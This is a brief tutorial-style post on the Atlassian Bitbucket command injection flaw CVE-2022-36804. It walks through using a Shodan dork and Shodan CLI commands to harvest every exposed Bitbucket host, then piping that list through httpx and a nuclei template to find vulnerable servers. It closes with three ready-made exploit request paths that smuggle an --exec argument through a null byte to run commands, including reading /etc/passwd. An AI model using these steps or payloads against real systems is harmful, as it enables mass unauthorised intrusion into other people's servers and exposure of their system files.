CVE-2022-36804

Hi Guys..

Today We explore the Atlassian Bitbucket Command Injection Vulnerability(CVE-2022-36804)	

Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request

Shodan Dork : 'http.component:"BitBucket"'

Run below commands to download the results ( Shodan Premium API Key is needed )
shodan download bitbucket 'http.component:"BitBucket"'    <--- This will download 1000 results

shodan download --limit -1 bitbucket 'http.component:"BitBucket"'  <-- This will download entire results

Now We will seperate the IP:PORT from shodan results. For this we will use shodan parse command along with awk

shodan parse bitbucket.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a bitbucketip.txt

We will using nuclei vulnerability scanner to automate the process.

cat bitbucketip.txt | httpx -silent | nuclei -t CVE-2022-36804.yaml| tee nuclei.txt

Check the Vulnerable URL

Thanks for watching !!

------------------------------
Sample Endpoint URL

/rest/api/latest/{projectpath}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin

/rest/api/latest/{projectpath}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60cat%20%2fetc%2fpasswd%60%00--remote=origin 

/rest/api/latest/{projectpath}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60pwd%60%00--remote=origin